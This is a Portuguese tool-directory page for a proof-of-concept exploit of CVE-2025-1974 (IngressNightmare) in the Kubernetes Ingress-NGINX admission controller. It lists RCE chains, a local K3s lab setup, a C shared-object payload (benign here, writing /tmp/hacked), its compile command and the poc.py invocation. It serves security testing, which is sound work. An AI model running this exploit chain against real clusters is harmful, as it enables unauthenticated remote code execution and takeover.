Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1974 — Exploit de prova de conceito para CVE-2025-1974 (IngressNightmare) que visa o Kubernetes Ingress-NGINX Admission Controller para obter execução remota de código por meio de solicitações AdmissionReview maliciosas. | Kitploit
Ferramentas/GitHubGitHub/chhhd/cve-2025-1974
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança na NuvemFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubchhhd/cve-2025-1974

CVE-2025-1974

Exploit de prova de conceito para CVE-2025-1974 (IngressNightmare) que visa o Kubernetes Ingress-NGINX Admission Controller para obter execução remota de código por meio de solicitações AdmissionReview maliciosas.

11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Kubernetes Ingress-NGINX Execução Remota de Código Não Autenticada (CVE-2025-1974)

Ingress-NGINX: Controlador de Ingress para Kubernetes que usa NGINX como proxy reverso e balanceador de carga

A vulnerabilidade "IngressNightmare" (CVE-2025-1974) decorre de uma falha crítica no Controlador de Admissão do Ingress-NGINX, que é o mecanismo de segurança central do Kubernetes para validar recursos de Ingress recebidos.

Este controlador é exposto na rede sem autenticação, permitindo que um invasor manipule solicitações maliciosas de AdmissionReview e insira configurações não autorizadas nos recursos de Ingress.

Quando combinada com outras vulnerabilidades (CVE-2025-24514, CVE-2024-1097 ou CVE-2025-1098), pode levar à execução remota de código.

Algumas cadeias exploráveis são:

CVE-2025-1974 + CVE-2025-24514: RCE via injeção de anotação auth-url

CVE-2025-1974 + CVE-2025-1097: RCE via anotação auth-tls-match-cn

CVE-2025-1974 + CVE-2025-1098: RCE via abuso de UID de imagem

Configuração do Ambiente

Para simular a vulnerabilidade, é utilizado um ambiente Kubernetes baseado em K3s por simplicidade

root@kitploit:~
docker compose up -d

Aguarde até que a API do Kubernetes esteja pronta e o controlador Ingress-nginx seja iniciado. Quando o ambiente estiver ativo, o Ingress-NGINX escutará nas portas 30080 e 30443 (TLS), e o Controlador de Admissão do Ingress-NGINX estará na porta 30443.

Processo de Execução

Primeiro, é necessário compilar um payload de objeto compartilhado (.so) que corresponda à arquitetura do contêiner.

root@kitploit:~
#include<stdio.h>
#include<stdlib.h>

__attribute__((constructor)) static void reverse_shell(void)
{
    system("touch /tmp/hacked");
}
  1. Compilar o código-fonte
root@kitploit:~
gcc -shared -fPIC -o shell.so shell.c
  1. Após compilar o código-fonte acima em um ambiente adequado, use exploit.py para explorar a vulnerabilidade
root@kitploit:~
python3 poc.py -a https://localhost:30443/networking/v1/ingresses -i http://localhost:30080/fake/addr -s shell.so

O exploit funciona forjando uma requisição de AdmissionReview que injeta diretivas forçando o NGINX a carregar um objeto compartilhado dinâmico malicioso.

Se o exploit for bem-sucedido, é possível verificar a criação do arquivo ssl_engine dentro do contêiner ingress-nginx.

image

Baixar ferramenta